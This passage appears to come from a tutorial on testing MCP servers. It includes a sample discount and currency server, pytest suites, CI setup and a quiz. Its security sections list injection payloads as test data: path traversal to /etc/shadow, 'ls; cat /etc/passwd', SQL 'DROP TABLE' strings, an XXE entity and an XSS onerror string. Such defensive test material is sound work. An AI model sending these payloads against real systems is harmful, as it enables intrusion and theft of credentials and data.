            "jsonrpc": "2.0",
            "id": 1,
            "method": "tools/call",
            "params": {

                "name": "search_files",
                "arguments": {
                    "query": payload
                }
            }
        }

        response=client.send(request) # Server should handle safely - either sanitize or reject if "result" in response: # Check result doesn't contain executed payload
 result_text=str(response["result"]) assert "etc/passwd" not in result_text assert "DROP TABLE" not in result_text elif "error" in response: # Error is acceptable - server rejected dangerous input pass else: pytest.fail("Unexpected response format")

2. Malformed Tool Payloads

def test_malformed_payloads(): "" "Test server's resilience to malformed requests" ""

        malformed_requests=[ # Missing required fields {
            "jsonrpc": "2.0", "method": "tools/call"
        }

        ,

        # Wrong JSON-RPC version {

            "jsonrpc": "1.0",
            "id": 1,
            "method": "tools/call",
            "params": {}
        }

        ,

        # Invalid method name {

            "jsonrpc": "2.0",
            "id": 1,
            "method": "/../../../etc/passwd",
            "params": {}
        }

        ,

        # Oversized payload {

            "jsonrpc": "2.0",
            "id": 1,
            "method": "tools/call",
            "params": {

                "name": "test",
                "arguments": {
                    "data": "X" * 10_000_000
                }
            }
        }

        ,

        # Deeply nested structure {

            "jsonrpc": "2.0",
            "id": 1,
            "method": "tools/call",
            "params": {
                "a": {
                    "b": {
                        "c": {
                            "d": {
                                "e": "..."
                            }
                        }
                    }
                }
            }
        }

        * 1000,

        # NULL bytes {

            "jsonrpc": "2.0",
            "id": 1,
            "method": "tools\x00/call",
            "params": {}
        }

        ,
        ] for malformed in malformed_requests: try: response=client.send(malformed) # Should return proper error,
        not crash assert "error" in response assert response["error"]["code"] in [-32700,
        -32600,
        -32602] except Exception as e: # Connection errors are acceptable (server protecting itself) print(f"Server rejected malformed request: {e}")

3. Input Fuzzing

import random import string def test_input_fuzzing(): "" "Fuzz test tool inputs" ""

        def generate_fuzz_string(length): "" "Generate random fuzz input" ""
        chars=string.printable+"" .join(chr(i) for i in range(128, 256)) return "" .join(random.choice(chars) for _ in range(length)) fuzz_cases=[ # Random strings generate_fuzz_string(100),
        generate_fuzz_string(1000),

        # Unicode edge cases "\u0000" * 100,
        # NULL bytes "\uffff" * 100,
        # Max unicode "πŸ”₯" * 100,
        # Emoji # Format strings "%s" * 100,
        "%n" * 100,

        # Boundary integers 2**31 - 1,
        # Max int32 2**63 - 1,
        # Max int64 -2**63,
        # Min int64] for fuzz_input in fuzz_cases: request= {

            "jsonrpc": "2.0",
            "id": 1,
            "method": "tools/call",
            "params": {

                "name": "process_text",
                "arguments": {
                    "text": fuzz_input
                }
            }
        }

        try: response=client.send(request) # Server should handle gracefully - not crash assert "result" in response or "error" in response except Exception as e: # Network errors are acceptable if server self-protects print(f"Fuzz input caused: {e}")

4. Authorization Testing

Test Case: Unauthorized Tool AccessGiven: User has permission for "read_data" tool only When: User attempts to call "delete_data" tool Then: Server returns 403 Forbidden error Test Case: Token ValidationGiven: Valid authentication token required When: Request sent without token Then: Server rejects with authentication error Test Case: Expired TokenGiven: Token expired 1 hour ago When: Request sent with expired token Then: Server rejects and requests re-authentication Test Case: Token TamperingGiven: Valid token signature When: Token payload is modified Then: Server detects tampering and rejects

5. Data Validation Security

def test_data_sanitization(): "" "Test that server sanitizes dangerous data" ""

        test_cases=[ {
            "name": "HTML Injection",
                "input": "<img src=x onerror=alert('XSS')>",
                "should_not_contain": ["<img", "onerror", "alert"]
        }

        ,
        {
        "name": "LDAP Injection",
            "input": "admin*",
            "should_not_contain": ["*"] # Wildcards should be escaped
        }

        ,
        {
        "name": "XML Injection",
            "input": "<?xml version='1.0'?><!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>",
            "should_not_contain": ["<!ENTITY", "SYSTEM"]
        }

        ] for test in test_cases: response=client.call_tool("process_input", {
            "data": test["input"]
        }) result_text=json.dumps(response) for dangerous_string in test["should_not_contain"]: assert dangerous_string not in result_text,
        \
 f"{test['name']}: Dangerous string '{dangerous_string}' not sanitized" 

Sample Malicious Payloads

 // 1. Path Traversal Attempt

            {

            "name": "read_file",
            "arguments": {
                "path": "../../../../etc/shadow"
            }
        }

        // 2. Command Injection
            {

            "name": "execute_command",
            "arguments": {
                "command": "ls; cat /etc/passwd"
            }
        }

        // 3. SQL Injection
            {

            "name": "search_users",
            "arguments": {
                "query": "' OR '1'='1' --"
            }
        }

        // 4. Buffer Overflow Attempt
            {

            "name": "process_data",
            "arguments": {
                "data": "A" * 1000000
            }
        }

        // 5. Resource Exhaustion
            {

            "name": "calculate",
            "arguments": {
                "iterations": 999999999999
            }
        }

        

πŸ§ͺ Security Test Design

Scenario:Your MCP server has a "database_query" tool that executes SQL queries.

Task:Design 5 security tests covering:

  1. SQL injection prevention
  2. Unauthorized table access
  3. Query timeout enforcement
  4. Dangerous SQL command blocking (DROP, DELETE ALL)
  5. Information disclosure prevention
Module 3.1

Hands-On Project Setup

Project Overview

We're going to build and test a real MCP server with two tools:

  • calculate_discount:Calculate discounted prices
  • currency_converter:Convert between currencies

Project Structure

mcp-discount-server/ β”œβ”€β”€ src/ β”‚ β”œβ”€β”€ server.py # Main MCP server β”‚ β”œβ”€β”€ tools/ β”‚ β”‚ β”œβ”€β”€ __init__.py β”‚ β”‚ β”œβ”€β”€ discount.py # Discount calculator tool β”‚ β”‚ └── currency.py # Currency converter tool β”‚ └── config.py # Configuration β”œβ”€β”€ tests/ β”‚ β”œβ”€β”€ __init__.py β”‚ β”œβ”€β”€ test_server.py # Server tests β”‚ β”œβ”€β”€ test_discount.py # Discount tool tests β”‚ β”œβ”€β”€ test_currency.py # Currency tool tests β”‚ β”œβ”€β”€ test_contract.py # Contract tests β”‚ β”œβ”€β”€ test_performance.py # Performance tests β”‚ └── test_security.py # Security tests β”œβ”€β”€ requirements.txt β”œβ”€β”€ pytest.ini └── README.md

Dependencies

# requirements.txt mcp>=0.1.0 pytest>=7.4.0 pytest-asyncio>=0.21.0 jsonschema>=4.19.0 aiohttp>=3.8.0 requests>=2.31.0

Server Implementation (Python)

Main Server (src/server.py)

"" "
 MCP Discount & Currency Server A sample MCP server demonstrating tool implementation and testing "" "


        from mcp.server import Server from mcp.types import Tool,
        TextContent import json # Import our tools from tools.discount import calculate_discount from tools.currency import convert_currency # Initialize MCP server server=Server("discount-currency-server") @server.list_tools() async def list_tools() ->list[Tool]: "" "
 List all available tools This is called during capability negotiation "" "
 return [ Tool(name="calculate_discount",
            description="Calculate discounted price based on original price and discount percentage",
            inputSchema= {

                "type": "object",
                "properties": {
                    "original_price": {
                        "type": "number",
                        "description": "Original price before discount",
                        "minimum": 0
                    }

                    ,
                    "discount_percent": {
                        "type": "number",
                        "description": "Discount percentage (0-100)",
                        "minimum": 0,
                        "maximum": 100
                    }
                }

                ,
                "required": ["original_price", "discount_percent"]

            }),
        Tool(name="currency_converter",
            description="Convert amount from one currency to another",
            inputSchema= {

                "type": "object",
                "properties": {
                    "amount": {
                        "type": "number",
                        "description": "Amount to convert",
                        "minimum": 0
                    }

                    ,
                    "from_currency": {
                        "type": "string",
                        "description": "Source currency code (e.g., USD)",
                        "pattern": "^[A-Z]{3}$"
                    }

                    ,
                    "to_currency": {
                        "type": "string",
                        "description": "Target currency code (e.g., EUR)",
                        "pattern": "^[A-Z]{3}$"
                    }
                }

                ,
                "required": ["amount", "from_currency", "to_currency"]
            })] @server.call_tool() async def call_tool(name: str, arguments: dict) ->list[TextContent]: "" "
 Execute a tool with given arguments "" "

        # Route to appropriate tool handler if name=="calculate_discount": result=calculate_discount(arguments["original_price"],
            arguments["discount_percent"]) return [TextContent(type="text", text=result)] elif name=="currency_converter": result=convert_currency(arguments["amount"],
            arguments["from_currency"],
            arguments["to_currency"]) return [TextContent(type="text", text=result)] else: raise ValueError(f"Unknown tool: {name}") async def main(): "" "Start the MCP server" ""
        from mcp.server.stdio import stdio_server async with stdio_server() as (read_stream, write_stream): await server.run(read_stream,
            write_stream,
            server.create_initialization_options()) if __name__=="__main__": import asyncio asyncio.run(main())

Discount Tool (src/tools/discount.py)

"" "
 Discount calculation tool "" "

        def calculate_discount(original_price: float, discount_percent: float) ->str: "" "
 Calculate discounted price Args: original_price: Original price before discount discount_percent: Discount percentage (0-100) Returns: Formatted string with discounted price Raises: ValueError: If inputs are invalid "" "

        # Input validation if original_price < 0: raise ValueError("Original price cannot be negative") if discount_percent < 0 or discount_percent>100: raise ValueError("Discount percent must be between 0 and 100") # Calculate discount discount_amount=original_price * (discount_percent / 100) final_price=original_price - discount_amount # Format response return (f"Discounted price: ${final_price:.2f} "
            f"({discount_percent}% off ${original_price:.2f})"
        )

Currency Tool (src/tools/currency.py)

"" "
 Currency conversion tool Note: Uses mock exchange rates for demo purposes "" "


        # Mock exchange rates (relative to USD) EXCHANGE_RATES= {
            "USD": 1.0,
                "EUR": 0.85,
                "GBP": 0.73,
                "JPY": 110.0,
                "CAD": 1.25,
                "AUD": 1.35,
        }

        def convert_currency(amount: float, from_currency: str, to_currency: str) ->str: "" "
 Convert amount between currencies Args: amount: Amount to convert from_currency: Source currency code (e.g., "USD") to_currency: Target currency code (e.g., "EUR") Returns: Formatted string with converted amount Raises: ValueError: If currency codes are invalid "" "

        # Input validation if amount < 0: raise ValueError("Amount cannot be negative") if from_currency not in EXCHANGE_RATES: raise ValueError(f"Unsupported currency: {from_currency}") if to_currency not in EXCHANGE_RATES: raise ValueError(f"Unsupported currency: {to_currency}") # Convert to USD first,
        then to target currency amount_in_usd=amount / EXCHANGE_RATES[from_currency] converted_amount=amount_in_usd * EXCHANGE_RATES[to_currency] # Format response return (f"{amount:.2f} {from_currency} = "
            f"{converted_amount:.2f} {to_currency}"
        )
βœ… Setup Complete

You now have a working MCP server ! In the next sections, we'll write comprehensive tests for it.

Module 3.2

Manual Testing Steps

Testing the MCP Server Manually

Before automating tests, let's manually verify the server works correctly.

1. Start the Server

$ cd mcp-discount-server $ python src/server.py

2. Test Tool Discovery

Request: List Available Tools

 {
            "jsonrpc": "2.0",
                "id": 1,
                "method": "tools/list"
        }

        

Expected Response:

 {

            "jsonrpc": "2.0",
            "id": 1,
            "result": {
                "tools": [ {

                    "name": "calculate_discount",
                    "description": "Calculate discounted price...",
                    "inputSchema": {
                        /* schema */
                    }
                }

                ,
                {

                "name": "currency_converter",
                "description": "Convert amount...",
                "inputSchema": {
                    /* schema */
                }
            }

            ]
        }
        }

        

3. Test Discount Calculator

Test Case 1: Valid Discount

 // Request

            {

            "jsonrpc": "2.0",
            "id": 2,
            "method": "tools/call",
            "params": {

                "name": "calculate_discount",
                "arguments": {
                    "original_price": 100.00,
                        "discount_percent": 20
                }
            }
        }

        // Expected Response
            {

            "jsonrpc": "2.0",
            "id": 2,
            "result": {
                "content": [ {
                    "type": "text",
                        "text": "Discounted price: $80.00 (20% off $100.00)"
                }

                ]
            }
        }

        

Test Case 2: Invalid Discount (> 100)

 // Request

            {

            "jsonrpc": "2.0",
            "id": 3,
            "method": "tools/call",
            "params": {

                "name": "calculate_discount",
                "arguments": {
                    "original_price": 100.00,
                        "discount_percent": 150
                }
            }
        }

        // Expected Response
            {

            "jsonrpc": "2.0",
            "id": 3,
            "error": {

                "code": -32602,
                "message": "Invalid params",
                "data": {
                    "details": "Discount percent must be between 0 and 100"
                }
            }
        }

        

4. Test Currency Converter

Test Case 1: USD to EUR

 // Request

            {

            "jsonrpc": "2.0",
            "id": 4,
            "method": "tools/call",
            "params": {

                "name": "currency_converter",
                "arguments": {
                    "amount": 100.00,
                        "from_currency": "USD",
                        "to_currency": "EUR"
                }
            }
        }

        // Expected Response
            {

            "jsonrpc": "2.0",
            "id": 4,
            "result": {
                "content": [ {
                    "type": "text",
                        "text": "100.00 USD = 85.00 EUR"
                }

                ]
            }
        }

        

Test Case 2: Invalid Currency Code

 // Request

            {

            "jsonrpc": "2.0",
            "id": 5,
            "method": "tools/call",
            "params": {

                "name": "currency_converter",
                "arguments": {
                    "amount": 100.00,
                        "from_currency": "USD",
                        "to_currency": "XYZ" // Invalid currency
                }
            }
        }

        // Expected Response
            {

            "jsonrpc": "2.0",
            "id": 5,
            "error": {

                "code": -32602,
                "message": "Invalid params",
                "data": {
                    "details": "Unsupported currency: XYZ"
                }
            }
        }

        

Manual Testing Checklist

Test Status Notes
Server starts successfully βœ“ / βœ—
Tools/list returns 2 tools βœ“ / βœ—
Discount: Valid input works βœ“ / βœ—
Discount: Negative price fails βœ“ / βœ—
Discount:>100% fails βœ“ / βœ—
Currency: Valid conversion works βœ“ / βœ—
Currency: Invalid code fails βœ“ / βœ—
Non-existent tool returns error βœ“ / βœ—
πŸ§ͺ Manual Testing Exercise

Task:Manually test the following scenarios and document results:

  1. Calculate discount with 0% discount
  2. Calculate discount with 100% discount
  3. Convert 0 USD to EUR
  4. Convert same currency (USD to USD)
  5. Call a tool that doesn't exist
  6. Send malformed JSON

For each test, record: input, expected output, actual output, pass/fail

Module 3.3

Test Automation Implementation

Automated Test Suite

Now let's automate our tests using Pytest.

Test Configuration (pytest.ini)

[pytest] testpaths=tests python_files=test_*.py python_classes=Test* python_functions=test_* asyncio_mode=auto markers=unit: Unit tests integration: Integration tests security: Security tests performance: Performance tests

Test Fixtures (tests/conftest.py)

"" "
 Pytest fixtures for MCP server testing "" "
 import pytest from mcp.client import Client import asyncio @pytest.fixture async def mcp_client(): "" "Create MCP client connected to test server" ""
        client=Client() await client.connect() yield client await client.disconnect() @pytest.fixture def sample_discount_params(): "" "Sample valid parameters for discount tool" ""

        return {
            "original_price": 100.00,
                "discount_percent": 20
        }

        @pytest.fixture def sample_currency_params(): "" "Sample valid parameters for currency tool" ""

        return {
            "amount": 100.00,
                "from_currency": "USD",
                "to_currency": "EUR"
        }

        

Functional Tests (tests/test_discount.py)

"" "
 Functional tests for discount calculator tool "" "
 import pytest @pytest.mark.unit async def test_calculate_discount_valid_input(mcp_client, sample_discount_params): "" "Test discount calculation with valid inputs" ""
        result=await mcp_client.call_tool("calculate_discount",
            sample_discount_params) assert "result" in result assert "Discounted price: $80.00" in result["result"]["content"][0]["text"] @pytest.mark.unit async def test_calculate_discount_zero_percent(mcp_client): "" "Test with 0% discount" ""

        result=await mcp_client.call_tool("calculate_discount",
            {
            "original_price": 100.00, "discount_percent": 0
        }) assert "Discounted price: $100.00" in result["result"]["content"][0]["text"] @pytest.mark.unit async def test_calculate_discount_hundred_percent(mcp_client): "" "Test with 100% discount" ""

        result=await mcp_client.call_tool("calculate_discount",
            {
            "original_price": 100.00, "discount_percent": 100
        }) assert "Discounted price: $0.00" in result["result"]["content"][0]["text"] @pytest.mark.unit async def test_calculate_discount_negative_price(mcp_client): "" "Test that negative price returns error" ""

        with pytest.raises(ValueError, match="cannot be negative"): await mcp_client.call_tool("calculate_discount",
            {
            "original_price": -50.00, "discount_percent": 20
        }) @pytest.mark.unit async def test_calculate_discount_invalid_percent(mcp_client): "" "Test that discount > 100 returns error" ""

        with pytest.raises(ValueError, match="must be between 0 and 100"): await mcp_client.call_tool("calculate_discount",
            {
            "original_price": 100.00, "discount_percent": 150
        }) @pytest.mark.unit async def test_calculate_discount_missing_field(mcp_client): "" "Test that missing required field returns error" ""

        with pytest.raises(Exception): # Should be validation error await mcp_client.call_tool("calculate_discount",
            {
            "original_price": 100.00
        }

        # Missing discount_percent) @pytest.mark.unit @pytest.mark.parametrize("price,discount,expected", [ (100, 10, "$90.00"),
            (50.50, 25, "$37.88"),
            (999.99, 33, "$670.19"),
            (0.01, 50, "$0.01"),
            ]) async def test_calculate_discount_parametrized(mcp_client, price, discount, expected): "" "Test multiple discount scenarios" ""

        result=await mcp_client.call_tool("calculate_discount",
            {
            "original_price": price, "discount_percent": discount
        }) assert expected in result["result"]["content"][0]["text"]

Contract Tests (tests/test_contract.py)

"" "
 Contract tests for MCP server "" "
 import pytest import jsonschema @pytest.mark.integration async def test_tools_list_contract(mcp_client): "" "Verify tools/list response matches contract" ""

        expected_schema= {

            "type": "object",
            "properties": {
                "tools": {

                    "type": "array",
                    "minItems": 2,
                    "items": {

                        "type": "object",
                        "properties": {
                            "name": {
                                "type": "string"
                            }

                            ,
                            "description": {
                                "type": "string"
                            }

                            ,
                            "inputSchema": {
                                "type": "object"
                            }
                        }

                        ,
                        "required": ["name",
                        "inputSchema"]
                    }
                }
            }

            ,
            "required": ["tools"]
        }

        result=await mcp_client.list_tools() jsonschema.validate(result, expected_schema) @pytest.mark.integration async def test_tool_response_structure(mcp_client): "" "Verify tool call response structure" ""

        result=await mcp_client.call_tool("calculate_discount",
            {
            "original_price": 100, "discount_percent": 20
        }) # Check JSON-RPC structure assert "jsonrpc" in result assert result["jsonrpc"]=="2.0"
        assert "id" in result assert "result" in result # Check result structure assert "content" in result["result"] assert isinstance(result["result"]["content"], list) assert len(result["result"]["content"])>0 assert result["result"]["content"][0]["type"]=="text"
        assert "text" in result["result"]["content"][0]

Performance Tests (tests/test_performance.py)

"" "
 Performance tests for MCP server "" "
 import pytest import asyncio import time import numpy as np @pytest.mark.performance async def test_response_time(mcp_client): "" "Test that response time is under 100ms" ""

        start=time.time() await mcp_client.call_tool("calculate_discount",
            {
            "original_price": 100, "discount_percent": 20
        }) end=time.time() response_time=(end - start) * 1000 # Convert to ms assert response_time < 100,
        f"Response time {response_time}ms exceeds 100ms"

        @pytest.mark.performance async def test_concurrent_requests(mcp_client): "" "Test server handles 10 concurrent requests" ""

        async def make_request(): return await mcp_client.call_tool("calculate_discount",
            {
            "original_price": 100, "discount_percent": 20
        }) # Execute 10 concurrent requests tasks=[make_request() for _ in range(10)] results=await asyncio.gather(*tasks) # Verify all succeeded assert len(results)==10 for result in results: assert "result" in result @pytest.mark.performance async def test_latency_percentiles(mcp_client): "" "Measure p50, p95, p99 latency" ""

        latencies=[] for _ in range(100): start=time.time() await mcp_client.call_tool("calculate_discount",
            {
            "original_price": 100, "discount_percent": 20
        }) end=time.time() latencies.append((end - start) * 1000) p50=np.percentile(latencies, 50) p95=np.percentile(latencies, 95) p99=np.percentile(latencies, 99) print(f"\nLatency percentiles:") print(f"  p50: {p50:.2f}ms") print(f"  p95: {p95:.2f}ms") print(f"  p99: {p99:.2f}ms") assert p95 < 100,
        f"p95 latency {p95}ms exceeds target"
        assert p99 < 500,
        f"p99 latency {p99}ms exceeds target" 

Security Tests (tests/test_security.py)

"" "
 Security tests for MCP server "" "
 import pytest @pytest.mark.security async def test_sql_injection_in_params(mcp_client): "" "Test SQL injection attempts are handled safely" ""

        sql_injections=[ "'; DROP TABLE users; --",
        "1' OR '1'='1",
        "admin' --",
        ] for injection in sql_injections: # Should handle gracefully - either reject or sanitize try: result=await mcp_client.call_tool("calculate_discount",
            {
            "original_price": injection, "discount_percent": 20
        }) # If it succeeds,
        check result doesn't contain injection
 assert "DROP TABLE" not in str(result) except Exception: # Error is acceptable - server rejected malicious input pass @pytest.mark.security async def test_large_payload(mcp_client): "" "Test server handles large payloads safely" ""

        large_value="X" * 1_000_000 with pytest.raises(Exception): # Should reject or timeout await mcp_client.call_tool("calculate_discount",
            {
            "original_price": large_value, "discount_percent": 20
        })

Running the Tests

# Run all tests $ pytest # Run specific test file $ pytest tests/test_discount.py # Run tests by marker $ pytest -m unit $ pytest -m security # Run with verbose output $ pytest -v # Run with coverage $ pytest --cov=src --cov-report=html

πŸ§ͺ Your Turn: Write Tests

Task:Write test cases for the currency_converter tool covering:

  1. Valid conversion (USD to EUR)
  2. Same currency conversion (USD to USD)
  3. Invalid currency code
  4. Negative amount
  5. Zero amount
  6. Missing required field

Use the discount tests as a template !

Module 4

Advanced SDET Architecture

Observability Design

Production MCP servers need comprehensive observability: logs, metrics, and traces.

Logging Strategy

import logging import json from datetime import datetime # Structured logging for MCP server logger=logging.getLogger("mcp_server") def log_tool_call(tool_name: str, params: dict, duration_ms: float, success: bool): "" "Log structured tool call data" ""

        log_entry= {
            "timestamp": datetime.utcnow().isoformat(),
                "event": "tool_call",
                "tool": tool_name,
                "params": params,
                "duration_ms": duration_ms,
                "success": success
        }

        logger.info(json.dumps(log_entry))

Metrics Collection

from prometheus_client import Counter,
        Histogram # Define metrics tool_calls_total=Counter('mcp_tool_calls_total',
            'Total tool calls',
            ['tool_name', 'status']) tool_duration_seconds=Histogram('mcp_tool_duration_seconds',
            'Tool execution duration',
            ['tool_name']) # Use in code tool_calls_total.labels(tool_name="calculate_discount", status="success").inc() tool_duration_seconds.labels(tool_name="calculate_discount").observe(0.05)

CI/CD Integration

GitHub Actions Workflow

# .github/workflows/test.yml name: MCP Server Tests on: [push,
        pull_request] jobs: test: runs-on: ubuntu-latest steps: - uses: actions/checkout@v2 - name: Set up Python uses: actions/setup-python@v2 with: python-version: '3.11'

        - name: Install dependencies run: | pip install -r requirements.txt pip install pytest pytest-cov - name: Run unit tests run: pytest -m unit --cov=src - name: Run integration tests run: pytest -m integration - name: Run security tests run: pytest -m security - name: Check coverage run: pytest --cov=src --cov-fail-under=80 - name: Contract tests (breaking change detection) run: pytest tests/test_contract.py --strict

Test Automation Architecture

Test Automation Architecture ════════════════════════════ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ CI/CD Pipeline β”‚ β”‚ β”‚ β”‚ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ β”‚ β”‚ Commit β”‚ β†’ β”‚ Run Tests β”‚ β†’ β”‚ Deploy β”‚ β”‚ β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”‚β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚ β”‚ β”Œβ”€β”€β”€β”€β”€β–Όβ”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β–Όβ”€β”€β”€β”€β” β”‚ Contract β”‚ β”‚ Unit β”‚ β”‚ Tests β”‚ β”‚ Tests β”‚ β””β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”˜ β”‚ β”‚ β”Œβ”€β”€β”€β”€β”€β–Όβ”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β–Όβ”€β”€β”€β”€β” β”‚Integrationβ”‚ β”‚Performanceβ”‚ β”‚ Tests β”‚ β”‚ Tests β”‚ β””β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”˜ β”‚ β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ β”‚ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β–Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β–Όβ”€β”€β”€β”€β”€β”€β”€β” β”‚ Test Reports β”‚ β”‚ β€’ Coverage β€’ Results β”‚ β”‚ β€’ Metrics β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Chaos Testing Strategies

Test server resilience under failure conditions:

import pytest import asyncio @pytest.mark.chaos async def test_server_restart_resilience(mcp_client): "" "Test client handles server restart" ""

        # Make initial call result1=await mcp_client.call_tool("calculate_discount", {
            ...

        }) assert "result" in result1 # Simulate server restart await server.restart() await asyncio.sleep(1) # Reconnect and retry await mcp_client.reconnect() result2=await mcp_client.call_tool("calculate_discount", {
            ...
        }) assert "result" in result2 @pytest.mark.chaos async def test_network_partition(mcp_client): "" "Test behavior during network issues" ""

        # Inject network delay with network_delay(500): # 500ms delay result=await mcp_client.call_tool("calculate_discount", {
            ...
        }) # Should still succeed but be slower @pytest.mark.chaos async def test_resource_exhaustion(mcp_client): "" "Test server under resource pressure" ""

        # Fill server memory with high_memory_pressure(): # Server should still respond result=await mcp_client.call_tool("calculate_discount", {
            ...
        }) assert "result" in result or "error" in result

Version Compatibility Testing

def test_backward_compatibility(): "" "Test new server version with old client" ""

        # V1 client v1_client=MCPClient(protocol_version="1.0") # V2 server (with new optional fields) v2_server=MCPServer(protocol_version="2.0") # V1 client should still work with V2 server result=v1_client.call_tool("calculate_discount",
            {
            "original_price": 100, "discount_percent": 20
        }

        # Not using new V2 fields) assert "result" in result
🎯 Key Takeaway

Advanced testing goes beyond functional validation. Focus on observability, automation, resilience, and maintaining compatibility as your system evolves.

Final Assessment

Knowledge Check Quiz

Test your understanding of MCP server testing. Select the best answer for each question.

Question 1 of 20
What is the primary difference between MCP and REST APIs?
A) MCP uses JSON while REST uses XML
B) MCP is stateful with bidirectional sessions, REST is typically stateless
C) MCP is faster than REST
D) MCP doesn't support error handling
Question 2 of 20
Which JSON-RPC error code indicates "Invalid params" ?
A) -32700
B) -32600
C) -32602
D) -32603
Question 3 of 20
What are the three primary MCP primitives?
A) GET, POST, DELETE
B) Tools, Resources, Prompts
C) Client, Server, Transport
D) Request, Response, Error
Question 4 of 20
In contract testing, which change is considered breaking?
A) Adding a new optional parameter
B) Adding a new tool
C) Adding a required parameter to an existing tool
D) Improving error messages
Question 5 of 20
What is the recommended p95 latency target for MCP tool calls?
A) < 10ms
B) < 100ms
C) < 1000ms
D) < 5000ms
Question 6 of 20
Which transport mechanism does MCP NOT support?
A) stdio
B) HTTP+SSE
C) WebSocket
D) gRPC
Question 7 of 20
In JSON Schema validation for MCP tools, which field is optional in the tool definition?
A) name
B) inputSchema
C) description
D) All fields are required
Question 8 of 20
What is prompt injection in the context of MCP security testing?
A) Injecting SQL commands into database queries
B) Manipulating tool parameters to execute unintended commands
C) Adding extra prompts to the MCP server
D) Overloading the server with too many prompts
Question 9 of 20
During capability negotiation, what should a client do if the server doesn't support a required capability?
A) Proceed anyway and hope for the best
B) Fail gracefully and inform the user
C) Try to force the server to support it
D) Automatically downgrade to HTTP
Question 10 of 20
What test type should you use to verify that removing a tool doesn't break existing clients?
A) Unit tests
B) Performance tests
C) Contract tests
D) Security tests
Question 11 of 20
In the MCP protocol, what does "listChanged: true" in capabilities mean?
A) The server can change its list of items
B) The server will notify clients when the list changes
C) The list has already changed
D) Clients must poll for list changes
Question 12 of 20
What is the primary purpose of fuzzing in MCP security testing?
A) To test server performance under load
B) To find unexpected crashes or vulnerabilities with random inputs
C) To test network latency
D) To validate JSON schema compliance
Question 13 of 20
Which pytest marker would you use for tests that validate the server can handle 100+concurrent requests?
A) @pytest.mark.unit
B) @pytest.mark.integration
C) @pytest.mark.performance
D) @pytest.mark.security
Question 14 of 20
What is the N Γ— M problem that MCP solves?
A) N AI applications Γ— M tools=NΓ—M custom integrations
B) N servers Γ— M clients=NΓ—M connections
C) N requests Γ— M responses=NΓ—M data transfer
D) N databases Γ— M queries=NΓ—M performance issues
Question 15 of 20
When testing tool schema validation, what should happen if a required field is missing?
A) Server should use a default value
B) Server should return error code -32602 (Invalid params)
C) Server should proceed with null value
D) Server should ask the client for the missing field
Question 16 of 20
What is the purpose of chaos testing in MCP server validation?
A) To create random test data
B) To test server resilience under failure conditions
C) To disorder test execution order
D) To test without any test plan
Question 17 of 20
In observability design, what are the three pillars you should implement?
A) Frontend, Backend, Database
B) Logs, Metrics, Traces
C) Unit, Integration, E2E tests
D) Client, Server, Transport
Question 18 of 20
Which test scenario best validates concurrent tool invocation handling?
A) Calling one tool 100 times sequentially
B) Calling the same tool 20 times simultaneously
C) Calling different tools one at a time
D) Testing with a single client connection
Question 19 of 20
What should you verify in a backward compatibility test?
A) Old server works with new client
B) New server works with old client
C) Both servers and clients are the same version
D) The database schema hasn't changed
Question 20 of 20
When should you use snapshot testing for MCP servers?
A) To capture performance metrics over time
B) To detect unintended changes in API response structure
C) To take screenshots of the UI
D) To backup the server state